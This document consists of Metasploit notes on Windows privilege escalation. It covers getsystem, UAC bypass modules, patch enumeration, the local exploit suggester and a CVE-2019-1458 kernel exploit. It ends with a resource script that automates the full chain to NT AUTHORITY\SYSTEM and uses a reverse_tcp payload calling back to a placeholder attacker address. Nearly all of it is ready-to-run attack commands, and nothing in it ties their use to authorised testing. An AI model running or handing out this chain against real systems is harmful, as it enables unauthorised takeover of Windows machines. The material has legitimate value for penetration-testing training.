Privilege Escalation------MSF Privilege Escalation
getsystem
meterpreter> getsystem   # tries several techniques in turn (named-pipe impersonation, token duplication)
# getsystem needs SeImpersonatePrivilege, i.e. a high-integrity (elevated) session or a service account;
# from a medium-integrity session it fails with "Access is denied", so bypass UAC first (next section).
meterpreter> getuid      # confirm: Server username: NT AUTHORITY\SYSTEM
BypassUAC
# UAC bypass modules (the current user must be in the local Administrators group; ask only pops a UAC prompt the user has to accept)
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use exploit/windows/local/bypassuac_vbs
use exploit/windows/local/ask
meterpreter> background             # send the current session to the background
msf> use exploit/windows/local/bypassuac
msf> set SESSION <session_id>       # backgrounding prints the session id; if unsure, list sessions with sessions -l
msf> run
# A successful bypass opens a new, high-integrity meterpreter session; run getsystem in that new session, not in the original one.
Kernel privilege escalation
# Enumerate installed patches (the installation dates show how stale the patch level is)
meterpreter> run post/windows/gather/enum_patches
[+] KB2999226 installed on 11/25/2020
[+] KB976902 installed on 11/21/2010
# Find candidate local exploits for this session
msf> use post/multi/recon/local_exploit_suggester
msf> set SESSION <session_id>
msf> run
# The suggester only runs each module's check: "appears to be vulnerable" means the OS/patch fingerprint matched,
# not that exploitation was confirmed. Kernel exploits can crash the target, so verify against enum_patches before running one.
# Exploitation example
msf> use exploit/windows/local/cve_2019_1458_wizardopium
msf> set SESSION <session_id>
msf> set LHOST <attacker IP>        # the new session's payload calls back to this address
msf> run
meterpreter> getuid
Server username: NT AUTHORITY\SYSTEM
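The whole workflow from the two sections above (patch enumeration, exploit suggestion, UAC bypass followed by getsystem, or a kernel exploit when the user is not an administrator) can be driven from one msfconsole resource script instead of being typed step by step. The script below is an added example, not taken from the original notes; the session id 1, attacker address 10.10.14.5 and port 4445 are placeholders that must be replaced. It relies on `sessions -i -1` (the most recently opened session) and `sessions -C` (run a meterpreter command in a session without interacting with it).

```rc
# msf_privesc.rc  (added example; run with: msfconsole -r msf_privesc.rc)
# Assumptions, not taken from the page: a low-privilege meterpreter session
# already exists as session 1; the attacker listens on 10.10.14.5:4445.
setg LHOST 10.10.14.5
setg LPORT 4445

# 1. Patch level of the target: same module the notes run from meterpreter,
#    here driven from msfconsole with an explicit SESSION.
use post/windows/gather/enum_patches
set SESSION 1
run

# 2. Candidate local exploits for session 1 (checks only, nothing is exploited yet).
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

# 3a. User is a local Administrator but the session is medium integrity:
#     bypass UAC, then getsystem inside the NEW high-integrity session.
#     Pick the target matching sysinfo (show targets) and an arch-matching payload.
use exploit/windows/local/bypassuac
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -z                      # -z: wait for the new session but do not interact with it
sessions -C getsystem -i -1     # run getsystem in the newest session
sessions -C getuid -i -1        # expect: Server username: NT AUTHORITY\SYSTEM

# 3b. Alternative when the user is NOT an administrator (3a fails): a kernel
#     exploit the suggester reported for session 1. Remove this block if 3a
#     succeeded; a kernel exploit can crash the target.
use exploit/windows/local/cve_2019_1458_wizardopium
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -z
sessions -C getuid -i -1        # expect: Server username: NT AUTHORITY\SYSTEM
```

Keep only one of the two finishing blocks for a real run: if 3a opened an elevated session there is no reason to also fire a kernel exploit at session 1, and if 3a failed because the user is not in Administrators, only 3b applies.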